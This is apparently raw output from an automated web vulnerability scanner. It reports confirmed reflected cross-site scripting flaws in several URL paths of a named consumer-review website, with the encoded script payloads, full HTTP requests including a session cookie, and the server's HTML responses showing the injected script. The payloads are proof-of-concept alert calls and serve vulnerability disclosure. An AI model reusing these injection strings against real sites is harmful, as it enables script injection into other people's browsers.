5px 15px;"> Online College Reviews FAQ</h1> <p>Frequently Asked Questions about Online College Reviews</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online College Reviews:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_college"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=..
- /online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CA)%3C/script%3E

/online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter    Type       Value
URI-BASED    Raw URI    '"--></style></script><script>alert(0x0002CA)</script>

Request

GET /online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CA)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_dating/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6980
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online dating, internet dating, matchmaking, dating site, Match.com, Chemistry.com, eHarmony, PerfectMatch.com, FriendFinder, Lavalife, Date.com, SpeedDate" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_dating/'"--></style></script><script>netsparker(0x0002CA)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> 
<!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002CA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && 
showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_dating_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Dating Site Reviews & Ratings FAQ</h1> <p>Frequently Asked Questions about Online Dating Site Reviews & Ratings</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Dating Site Reviews & Ratings:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" 
name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_dating"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=..
- /online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CC)%3C/script%3E

/online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CC)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enets..

Parameters

Parameter    Type       Value
URI-BASED    Raw URI    '"--></style></script><script>alert(0x0002CC)</script>

Request

GET /online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CC)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_dating/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6996
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online dating, internet dating, matchmaking, dating site, Match.com, Chemistry.com, eHarmony, PerfectMatch.com, FriendFinder, Lavalife, Date.com, SpeedDate" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_dating/index.php'"--></style></script><script>netsparker(0x0002CC)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content 
Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option 
value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002CC)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && 
showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_dating_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Dating Site Reviews & Ratings FAQ</h1> <p>Frequently Asked Questions about Online Dating Site Reviews & Ratings</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Dating Site Reviews & Ratings:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" 
name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_dating"> <input type="hidden" name="FieldData4" 
value="..
- /online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002E9)%3C/script%3E

/online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002E9)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0002E9)</script>

Request

GET /online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_meeting/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6669
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online meeting, web conferencing, web conference, video conference, conferencing, internet meeting, Adobe Acrobat Connect Pro, WebEx, Dimdim, Fuze Meeting, GoToMeeting, Yugma, Voxwire" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_meeting/'"--></style></script><script>netsparker(0x0002E9)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> 
<!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option 
value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002E9)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && 
showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_meeting_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Meeting FAQ</h1> <p>Frequently Asked Questions about Online Meeting</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Meeting:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" 